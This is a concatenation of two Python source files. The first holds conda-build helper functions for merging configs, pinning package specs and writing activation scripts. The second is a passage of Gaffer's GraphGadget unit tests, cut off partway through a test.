    if dedupe:
        log.addFilter(dedupe_filter)

    # these are defaults. They can be overridden by configuring a log config yaml file.
    # only attach handlers once per logger (handlers persist across calls)
    if not log.handlers and add_stdout_stderr_handlers:
        stdout_handler = logging.StreamHandler(sys.stdout)
        stderr_handler = logging.StreamHandler(sys.stderr)
        stdout_handler.addFilter(info_debug_stdout_filter)
        stderr_handler.addFilter(warning_error_stderr_filter)
        stdout_handler.setLevel(level)
        stderr_handler.setLevel(level)
        log.addHandler(stdout_handler)
        log.addHandler(stderr_handler)
    return log
def _equivalent(base_value, value, path):
    """Return True when two config values match, treating relative string
    paths rooted at ``path`` as equal to their absolute forms."""
    if value == base_value:
        return True
    if isinstance(value, string_types) and isinstance(base_value, string_types):
        def _absolutize(p):
            if os.path.isabs(p):
                return p
            return os.path.abspath(os.path.normpath(os.path.join(path, p)))
        return _absolutize(base_value) == _absolutize(value)
    return False
def merge_or_update_dict(base, new, path="", merge=True, raise_on_clobber=False, add_missing_keys=True):
    """Merge ``new`` into ``base`` in place and return ``base``.

    Nested dicts are merged recursively; non-string iterables are
    concatenated when ``merge`` is True and replaced otherwise.  Scalars
    from ``new`` win; a None value deletes the key.  When
    ``add_missing_keys`` is False, keys absent from ``base`` are skipped.
    ``path`` roots relative-path comparison in _equivalent.  Despite its
    name, ``raise_on_clobber`` only logs clobbers at debug level.
    """
    if base == new:
        return base
    log = get_logger(__name__)
    for key, value in new.items():
        if key in base or add_missing_keys:
            base_value = base.get(key, value)
            if hasattr(value, 'keys'):
                # NOTE(review): the recursive call does not forward
                # add_missing_keys, so nested dicts always add keys —
                # confirm whether that is intentional.
                base_value = merge_or_update_dict(base_value, value, path, merge,
                                                  raise_on_clobber=raise_on_clobber)
                base[key] = base_value
            elif hasattr(value, '__iter__') and not isinstance(value, string_types):
                if merge:
                    if base_value != value:
                        try:
                            base_value.extend(value)
                        except (TypeError, AttributeError):
                            # base value isn't a list (or is immutable): replace it
                            base_value = value
                    try:
                        base[key] = list(base_value)
                    except TypeError:
                        base[key] = base_value
                else:
                    base[key] = value
            else:
                if (base_value and merge and not _equivalent(base_value, value, path) and
                        raise_on_clobber):
                    log.debug('clobbering key {} (original value {}) with value {}'.format(key,
                              base_value, value))
                if value is None and key in base:
                    del base[key]
                else:
                    base[key] = value
    return base
def merge_dicts_of_lists(dol1, dol2):
    """Merge two dicts-of-lists, concatenating the lists for shared keys.

    From Alex Martelli: https://stackoverflow.com/a/1495821/3257826
    """
    empty = []
    return dict((key, dol1.get(key, empty) + dol2.get(key, empty))
                for key in set(dol1).union(dol2))
def prefix_files(prefix):
    """Return the set of all file paths under ``prefix``, relative to it.

    Symlinked directories are recorded as entries themselves and their
    contents expanded via expand_globs.
    """
    found = set()
    prefix_with_sep = prefix + os.path.sep
    for root, dirs, files in walk(prefix):
        for fname in files:
            # this is relpath, just hacked to be faster
            found.add(join(root, fname).replace(prefix_with_sep, '', 1))
        for dname in dirs:
            full = join(root, dname)
            if islink(full):
                found.add(full.replace(prefix_with_sep, '', 1))
                found.update(expand_globs((full, ), prefix))
    return found
def mmap_mmap(fileno, length, tagname=None, flags=0, prot=mmap_PROT_READ | mmap_PROT_WRITE,
              access=None, offset=0):
    '''
    Hides the differences between mmap.mmap on Windows and Unix.
    Windows has `tagname`.
    Unix does not, but makes up for it with `flags` and `prot`.
    On both, the default value for `access` is determined from how the file
    was opened so must not be passed in at all to get this default behaviour.
    '''
    # platform-specific keywords first; access/offset are only forwarded when
    # an explicit access mode was requested (no access => no offset either)
    platform_kwargs = {'tagname': tagname} if on_win else {'flags': flags, 'prot': prot}
    if access:
        platform_kwargs['access'] = access
        platform_kwargs['offset'] = offset
    return mmap.mmap(fileno, length, **platform_kwargs)
def remove_pycache_from_scripts(build_prefix):
    """Remove pip created pycache directory from bin or Scripts."""
    scripts_dir = os.path.join(build_prefix, 'Scripts' if on_win else 'bin')
    if not os.path.isdir(scripts_dir):
        return
    for entry in os.listdir(scripts_dir):
        entry_path = os.path.join(scripts_dir, entry)
        if os.path.isdir(entry_path) and entry.strip(os.sep) == '__pycache__':
            shutil.rmtree(entry_path)
        elif os.path.isfile(entry_path) and entry_path.endswith('.pyc'):
            os.remove(entry_path)
def sort_list_in_nested_structure(dictionary, omissions=''):
    """Recurse through a nested dictionary and sort any lists found in place.

    Lists inside second-level dict values are sorted only when every element
    is a string (mixed types may not be comparable); ``omissions`` names
    'field/key' paths whose lists are left untouched at this level.
    Top-level lists are sorted best-effort, recursing into dict elements.
    """
    for outer_key, outer_val in dictionary.items():
        if isinstance(outer_val, dict):
            for inner_key in outer_val.keys():
                entry = dictionary[outer_key][inner_key]
                if isinstance(entry, dict):
                    sort_list_in_nested_structure(entry)
                    continue
                all_strings = (isinstance(entry, list) and
                               all(isinstance(item, str) for item in entry))
                if all_strings and '{}/{}' .format(outer_key, inner_key) not in omissions:
                    entry.sort()
        # there's a possibility for nested lists containing dictionaries
        # in this case we recurse until we find a list to sort
        elif isinstance(outer_val, list):
            for member in outer_val:
                if isinstance(member, dict):
                    sort_list_in_nested_structure(member)
            try:
                outer_val.sort()
            except TypeError:
                # mixed, incomparable element types: leave the list as-is
                pass
# group one: package name
# group two: version (allows _, +, . in version)
# group three: build string - mostly not used here. Match primarily matters
#   to specify when not to add .*
# if you are seeing mysterious unsatisfiable errors, with the package you're building being the
# unsatisfiable part, then you probably need to update this regex.
spec_needing_star_re = re.compile(r"([\w\d\.\-\_]+)\s+((?<![><=])[\w\d\.\-\_]+?(?!\*))(\s+[\w\d\.\_]+)?$")  # NOQA
# a bare version (digits/letters/dots only, no operators) that needs '.*' appended
spec_ver_needing_star_re = re.compile("^([0-9a-zA-Z\.]+)$")
def ensure_valid_spec(spec, warn=False):
    """Append '.*' to bare version pins so conda treats them as prefix matches.

    Accepts either a MatchSpec or a plain "name version [build]" string.
    Exact pins (with a build string) and the special python/numpy 'x.x'
    placeholder are left alone.  With ``warn``, a deprecation-style warning
    is logged when a string spec is rewritten.
    """
    if isinstance(spec, MatchSpec):
        if (hasattr(spec, 'version') and spec.version and (not spec.get('build', '')) and
                spec_ver_needing_star_re.match(str(spec.version))):
            if str(spec.name) not in ('python', 'numpy') or str(spec.version) != 'x.x':
                spec = MatchSpec("{} {}".format(str(spec.name), str(spec.version) + '.*'))
    else:
        match = spec_needing_star_re.match(spec)
        # ignore exact pins (would be a 3rd group)
        if match and not match.group(3):
            if match.group(1) in ('python', 'numpy') and match.group(2) == 'x.x':
                # 'x.x' placeholder: normalize whitespace, resolved elsewhere
                spec = spec_needing_star_re.sub(r"\1 \2", spec)
            else:
                if "*" not in spec:
                    if match.group(1) not in ('python', 'vc') and warn:
                        log = get_logger(__name__)
                        log.warn("Adding .* to spec '{}' to ensure satisfiability. Please "
                                 "consider putting {{{{ var_name }}}}.* or some relational "
                                 "operator (>/</>=/<=) on this spec in meta.yaml, or if req is "
                                 "also a build req, using {{{{ pin_compatible() }}}} jinja2 "
                                 "function instead. See "
                                 "https://conda.io/docs/user-guide/tasks/build-packages/variants.html#pinning-at-the-variant-level" # NOQA
                                 .format(spec))
                    spec = spec_needing_star_re.sub(r"\1 \2.*", spec)
    return spec
def insert_variant_versions(requirements_dict, variant, env):
    """Pin unversioned requirements in requirements_dict[env] from ``variant``.

    For each variant key matching a bare package name in the ``env`` section
    (build/host always; run only when the package is also a build/host dep),
    the spec is replaced with "name version.*".  'name x.x' placeholders are
    likewise resolved from the variant.  Mutates requirements_dict in place.
    """
    build_deps = (ensure_list(requirements_dict.get('build')) +
                  ensure_list(requirements_dict.get('host')))
    reqs = ensure_list(requirements_dict.get(env))
    for key, val in variant.items():
        # variant keys use '_' where package names may use '-'
        regex = re.compile(r'^(%s)(?:\s*$)' % key.replace('_', '[-_]'))
        matches = [regex.match(pkg) for pkg in reqs]
        if any(matches):
            for i, x in enumerate(matches):
                if x and (env in ('build', 'host') or x.group(1) in build_deps):
                    # delete+insert at the same index keeps reqs aligned with matches
                    del reqs[i]
                    if not isinstance(val, string_types):
                        val = val[0]
                    reqs.insert(i, ensure_valid_spec(' '.join((x.group(1), val))))

    # second pass: resolve 'name x.x' placeholders from the variant
    xx_re = re.compile("([0-9a-zA-Z\.\-\_]+)\s+x\.x")

    matches = [xx_re.match(pkg) for pkg in reqs]
    if any(matches):
        for i, x in enumerate(matches):
            if x:
                del reqs[i]
                reqs.insert(i, ensure_valid_spec(' '.join((x.group(1), variant.get(x.group(1))))))
    if reqs:
        requirements_dict[env] = reqs
def match_peer_job(target_matchspec, other_m, this_m=None):
    """target_matchspec comes from the recipe. target_variant is the variant from the recipe whose
    deps we are matching. m is the peer job, which must satisfy conda and also have matching keys
    for any keys that are shared between target_variant and m.config.variant"""
    match_dict = {'name': other_m.name(),
                  'version': other_m.version(),
                  'build': '', }
    if conda_43:
        # older conda (4.3) matches against Dist records rather than plain dicts
        match_dict = Dist(name=match_dict['name'],
                          dist_name='-'.join((match_dict['name'],
                                              match_dict['version'],
                                              match_dict['build'])),
                          version=match_dict['version'],
                          build_string=match_dict['build'],
                          build_number=int(other_m.build_number() or 0),
                          channel=None)
    matchspec_matches = target_matchspec.match(match_dict)

    variant_matches = True
    if this_m:
        # loop variables used by both jobs must take identical values
        other_m_used_vars = other_m.get_used_loop_vars()
        for v in this_m.get_used_loop_vars():
            if v in other_m_used_vars:
                variant_matches &= this_m.config.variant[v] == other_m.config.variant[v]
    return matchspec_matches and variant_matches
def expand_reqs(reqs_entry):
    """Normalize a requirements entry into {section: [specs]} form.

    A bare list (old-style requirements) is applied to both 'host' and
    'run'; a mapping has each section's value coerced to a list in place.
    """
    if not hasattr(reqs_entry, 'keys'):
        listed = ensure_list(reqs_entry)[:]
        reqs_entry = {'host': ensure_list(listed),
                      'run': ensure_list(listed)} if listed else {}
        return reqs_entry
    for section in reqs_entry:
        reqs_entry[section] = ensure_list(reqs_entry[section])
    return reqs_entry
def sha256_checksum(filename, buffersize=65536):
    """Return the hex SHA-256 digest of ``filename``, or None when it is not
    a regular file.  Reads in ``buffersize`` chunks to bound memory use."""
    if not isfile(filename):
        return None
    digest = hashlib.sha256()
    with open(filename, 'rb') as fh:
        chunk = fh.read(buffersize)
        while chunk:
            digest.update(chunk)
            chunk = fh.read(buffersize)
    return digest.hexdigest()
def write_bat_activation_text(file_handle, m):
    """Write conda environment activation lines into a Windows batch script.

    Activates the host prefix, then (conda >= 4.6) stacks the build prefix
    on top so build-tool executables come first on PATH.
    """
    if conda_46:
        # conda >= 4.6: hook the shell first so 'conda activate' is available
        file_handle.write('call "{conda_root}\\..\\condabin\\conda_hook.bat"\n'.format(
            conda_root=root_script_dir,
        ))
    if m.is_cross:
        # HACK: we need both build and host envs "active" - i.e. on PATH,
        #     and with their activate.d scripts sourced. Conda only
        #     lets us activate one, though. This is a
        #     vile hack to trick conda into "stacking"
        #     two environments.
        #
        # Net effect: binaries come from host first, then build
        #
        # Conda 4.4 may break this by reworking the activate scripts.
        #  ^^ shouldn't be true
        # In conda 4.4, export CONDA_MAX_SHLVL=2 to stack envs to two
        #    levels deep.
        # conda 4.4 does require that a conda-meta/history file
        #    exists to identify a valid conda environment
        # conda 4.6 changes this one final time, by adding a '--stack' flag to the 'activate'
        #    command, and 'activate' does not stack environments by default without that flag
        history_file = join(m.config.host_prefix, 'conda-meta', 'history')
        if not isfile(history_file):
            if not isdir(dirname(history_file)):
                os.makedirs(dirname(history_file))
            open(history_file, 'a').close()
        if conda_46:
            file_handle.write('call "{conda_root}\\..\\condabin\\conda.bat" activate "{prefix}"\n'.format(
                conda_root=root_script_dir,
                prefix=m.config.host_prefix,
            ))
        else:
            file_handle.write('call "{conda_root}\\activate.bat" "{prefix}"\n'.format(
                conda_root=root_script_dir,
                prefix=m.config.host_prefix))
            # removing this placeholder should make conda double-activate with conda 4.3
            file_handle.write('set "PATH=%PATH:CONDA_PATH_PLACEHOLDER;=%"\n')
            file_handle.write('set CONDA_MAX_SHLVL=2\n')

    # Write build prefix activation AFTER host prefix, so that its executables come first
    if conda_46:
        file_handle.write('call "{conda_root}\\..\\condabin\\conda.bat" activate --stack "{prefix}"\n'.format(
            conda_root=root_script_dir,
            prefix=m.config.build_prefix,
        ))
    else:
        file_handle.write('call "{conda_root}\\activate.bat" "{prefix}"\n'.format(
            conda_root=root_script_dir,
            prefix=m.config.build_prefix))
# module-level cache: channel_url -> merged channeldata dict
channeldata_cache = {}


def download_channeldata(channel_url):
    """Fetch and merge channeldata.json across a channel's platform URLs.

    Results are cached per channel_url; file:// channels are always re-read
    since local channels can change between calls.  URLs that fail to
    download or parse contribute an empty dict.
    """
    global channeldata_cache
    if channel_url.startswith('file://') or channel_url not in channeldata_cache:
        urls = get_conda_channel(channel_url).urls()
        # strip the trailing platform/subdir component and de-duplicate
        urls = set(url.rsplit('/', 1)[0] for url in urls)
        data = {}
        for url in urls:
            with TemporaryDirectory() as td:
                tf = os.path.join(td, "channeldata.json")
                try:
                    download(url + '/channeldata.json', tf)
                    with open(tf) as f:
                        new_channeldata = json.load(f)
                except (JSONDecodeError, CondaHTTPError):
                    new_channeldata = {}
                merge_or_update_dict(data, new_channeldata)
        channeldata_cache[channel_url] = data
    else:
        data = channeldata_cache[channel_url]
    return data
|
GraphGadgetTest.py | ##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import threading
import imath
import IECore
import Gaffer
import GafferUI
import GafferTest
import GafferUITest
class NestedPlugTestNode( Gaffer.Node ) :
	"""Minimal node used by the nested-plug tests below."""

	def __init__( self ) :

		Gaffer.Node.__init__( self )

IECore.registerRunTimeTyped( NestedPlugTestNode )
# Give plug "c" a CompoundNodule so its child plugs get nodules of their own.
Gaffer.Metadata.registerValue( NestedPlugTestNode, "c", "nodule:type", "GafferUI::CompoundNodule" )
class GraphGadgetTest( GafferUITest.TestCase ) :
def testRemovedNodesDontHaveGadgets( self ) :
	"""Deleting a node from the script removes its gadget from the graph."""

	s = Gaffer.ScriptNode()
	g = GafferUI.GraphGadget( s )

	n = GafferTest.AddNode()
	s["add1"] = n
	self.assertIsNotNone( g.nodeGadget( n ) )

	s.deleteNodes( filter = Gaffer.StandardSet( [ n ] ) )
	self.assertIsNone( g.nodeGadget( n ) )
def testRemovedNodesDontHaveConnections( self ) :
	"""Deleting a node also removes the connection gadgets into its plugs."""

	s = Gaffer.ScriptNode()

	n = GafferTest.AddNode()
	s["add1"] = n
	s["add2"] = GafferTest.AddNode()
	s["add1"]["op1"].setInput( s["add2"]["sum"] )

	g = GafferUI.GraphGadget( s )

	s.deleteNodes( filter = Gaffer.StandardSet( [ s["add1"] ] ) )
	self.assertIsNone( g.connectionGadget( n["op1"] ) )
def testCreateWithFilter( self ) :
	"""Only nodes in the filter set get gadgets when the gadget is created."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testEditFilter( self ) :
	"""Adding/removing nodes in the filter set shows/hides their gadgets."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( script.children() )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	nodeFilter.remove( script["add1"] )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	nodeFilter.remove( script["add2"] )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )

	nodeFilter.add( script["add1"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )

	nodeFilter.add( script["add2"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testUnhidingConnectedDstNodes( self ) :
	"""Unhiding a destination node also makes its input connection appear."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()
	script["add2"]["op1"].setInput( script["add1"]["sum"] )

	nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )
	self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )

	nodeFilter.add( script["add2"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
	self.assertIsNotNone( g.connectionGadget( script["add2"]["op1"] ) )
def testCreatingWithHiddenSrcNodes( self ) :
	"""A connection from a hidden source is drawn with no source nodule."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()
	script["add2"]["op1"].setInput( script["add1"]["sum"] )

	nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	c = g.connectionGadget( script["add2"]["op1"] )
	self.assertIsNotNone( c )
	self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
	self.assertEqual( c.srcNodule(), None )
def testHidingConnectedDstNodes( self ) :
	"""Hiding a destination node removes its gadget and input connection."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()
	script["add2"]["op1"].setInput( script["add1"]["sum"] )

	nodeFilter = Gaffer.StandardSet( script.children() )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
	self.assertIsNotNone( g.connectionGadget( script["add2"]["op1"] ) )

	nodeFilter.remove( script["add2"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )
	self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
def testHidingConnectedSrcNodes( self ) :
	"""Hiding a source node keeps the connection but drops its source nodule."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()
	script["add2"]["op1"].setInput( script["add1"]["sum"] )

	nodeFilter = Gaffer.StandardSet( [ script["add1"], script["add2"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	c = g.connectionGadget( script["add2"]["op1"] )
	self.assertIsNotNone( c )
	self.assertTrue( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
	self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )

	nodeFilter.remove( script["add1"] )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )

	c = g.connectionGadget( script["add2"]["op1"] )
	self.assertIsNotNone( c )
	self.assertIsNone( c.srcNodule() )
	self.assertTrue( c.dstNodule().plug().isSame( script["add2"]["op1"] ) )
def testConnectingInvisibleDstNodes( self ) :
	"""Connecting into a node that was never shown creates no gadgets."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )
	self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenDstNodes( self ) :
	"""Connecting into a node hidden after creation creates no gadgets."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( script.children() )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	nodeFilter.remove( script["add2"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )
	self.assertIsNone( g.connectionGadget( script["add2"]["op1"] ) )
def testConnectingHiddenSrcNodes( self ) :
	"""Connecting from a hidden source yields a connection with no src nodule."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	c = g.connectionGadget( script["add2"]["op1"] )
	self.assertIsNotNone( c )
	self.assertIsNone( c.srcNodule() )
def testConnectingHiddenSrcNodesAndReshowing( self ) :
	"""Re-showing a hidden source restores the connection's source nodule."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( [ script["add2"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	script["add2"]["op1"].setInput( script["add1"]["sum"] )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	c = g.connectionGadget( script["add2"]["op1"] )
	self.assertIsNotNone( c )
	self.assertIsNone( c.srcNodule() )

	nodeFilter.add( script["add1"] )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	c = g.connectionGadget( script["add2"]["op1"] )
	self.assertIsNotNone( c )
	self.assertTrue( c.srcNodule().plug().isSame( script["add1"]["sum"] ) )
def testChangingFilter( self ) :
	"""setFilter() swaps which node set controls gadget visibility."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet( [ script["add1"] ] )
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNotNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )

	nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
	g.setFilter( nodeFilter2 )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testChangingFilterAndEditingOriginal( self ) :
	"""Edits to a replaced filter set no longer affect the graph gadget."""

	script = Gaffer.ScriptNode()
	script["add1"] = GafferTest.AddNode()
	script["add2"] = GafferTest.AddNode()

	nodeFilter = Gaffer.StandardSet()
	g = GafferUI.GraphGadget( script, nodeFilter )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNone( g.nodeGadget( script["add2"] ) )

	nodeFilter2 = Gaffer.StandardSet( [ script["add2"] ] )
	g.setFilter( nodeFilter2 )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )

	nodeFilter.add( script["add1"] )
	self.assertIsNone( g.nodeGadget( script["add1"] ) )
	self.assertIsNotNone( g.nodeGadget( script["add2"] ) )
def testConnectionsForNestedPlugs( self ) :
    """Connections between nested plugs survive nodes leaving and re-entering the filter."""
    s = Gaffer.ScriptNode()
    s["n"] = NestedPlugTestNode()
    s["n"]["c"] = Gaffer.Plug()
    s["n"]["c"]["i"] = Gaffer.IntPlug()
    s["n2"] = NestedPlugTestNode()
    s["n2"]["c"] = Gaffer.Plug( direction = Gaffer.Plug.Direction.Out )
    s["n2"]["c"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
    s["n"]["c"]["i"].setInput( s["n2"]["c"]["o"] )
    filterSet = Gaffer.StandardSet( s.children() )
    gg = GafferUI.GraphGadget( s, filterSet )
    def assertFullConnection() :
        # Both endpoints visible : connection has src and dst nodules.
        cg = gg.connectionGadget( s["n"]["c"]["i"] )
        self.assertIsNotNone( cg )
        self.assertTrue( cg.srcNodule().plug().isSame( s["n2"]["c"]["o"] ) )
        self.assertTrue( cg.dstNodule().plug().isSame( s["n"]["c"]["i"] ) )
    assertFullConnection()
    # Hiding the source node leaves a dangling connection with no source nodule.
    filterSet.remove( s["n2"] )
    self.assertIsNone( gg.nodeGadget( s["n2"] ) )
    cg = gg.connectionGadget( s["n"]["c"]["i"] )
    self.assertIsNotNone( cg )
    self.assertIsNone( cg.srcNodule() )
    self.assertTrue( cg.dstNodule().plug().isSame( s["n"]["c"]["i"] ) )
    # Reshowing the source restores the full connection.
    filterSet.add( s["n2"] )
    self.assertIsNotNone( gg.nodeGadget( s["n2"] ) )
    assertFullConnection()
    # Hiding the destination node removes the connection entirely.
    filterSet.remove( s["n"] )
    self.assertIsNone( gg.nodeGadget( s["n"] ) )
    self.assertIsNone( gg.connectionGadget( s["n"]["c"]["i"] ) )
    # And reshowing it restores everything again.
    filterSet.add( s["n"] )
    self.assertIsNotNone( gg.nodeGadget( s["n"] ) )
    assertFullConnection()
def testRemovePlugWithInputConnection( self ) :
    """Deleting a destination plug removes its connection gadget; undo restores it."""
    s = Gaffer.ScriptNode()
    s["n1"] = Gaffer.Node()
    s["n2"] = Gaffer.Node()
    s["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
    s["n2"]["i"] = Gaffer.IntPlug()
    s["n2"]["i"].setInput( s["n1"]["o"] )
    gadget = GafferUI.GraphGadget( s )
    self.assertIsNotNone( gadget.connectionGadget( s["n2"]["i"] ) )
    with Gaffer.UndoScope( s ) :
        # Keep a handle so we can query the gadget after removal.
        doomed = s["n2"]["i"]
        del s["n2"]["i"]
    self.assertIsNone( gadget.connectionGadget( doomed ) )
    s.undo()
    self.assertIsNotNone( gadget.connectionGadget( s["n2"]["i"] ) )
def testRemovePlugWithOutputConnection( self ) :
    """Deleting the source plug removes the connection gadget; undo restores it."""
    s = Gaffer.ScriptNode()
    s["n1"] = Gaffer.Node()
    s["n2"] = Gaffer.Node()
    s["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
    s["n2"]["i"] = Gaffer.IntPlug()
    s["n2"]["i"].setInput( s["n1"]["o"] )
    gadget = GafferUI.GraphGadget( s )
    self.assertIsNotNone( gadget.connectionGadget( s["n2"]["i"] ) )
    with Gaffer.UndoScope( s ) :
        del s["n1"]["o"]
    self.assertIsNone( gadget.connectionGadget( s["n2"]["i"] ) )
    s.undo()
    self.assertIsNotNone( gadget.connectionGadget( s["n2"]["i"] ) )
def testConnectionBound( self ) :
    """A connection gadget's bound is non-empty and lies near its two nodes."""
    # Repeated many times to give any intermittent layout variation a
    # chance to show up — presumably node placement is not fully
    # deterministic (TODO confirm).
    for _ in range( 100 ) :
        s = Gaffer.ScriptNode()
        s["n1"] = Gaffer.Node()
        s["n2"] = Gaffer.Node()
        s["n1"]["o"] = Gaffer.IntPlug( direction = Gaffer.Plug.Direction.Out )
        s["n2"]["i"] = Gaffer.IntPlug()
        s["n2"]["i"].setInput( s["n1"]["o"] )
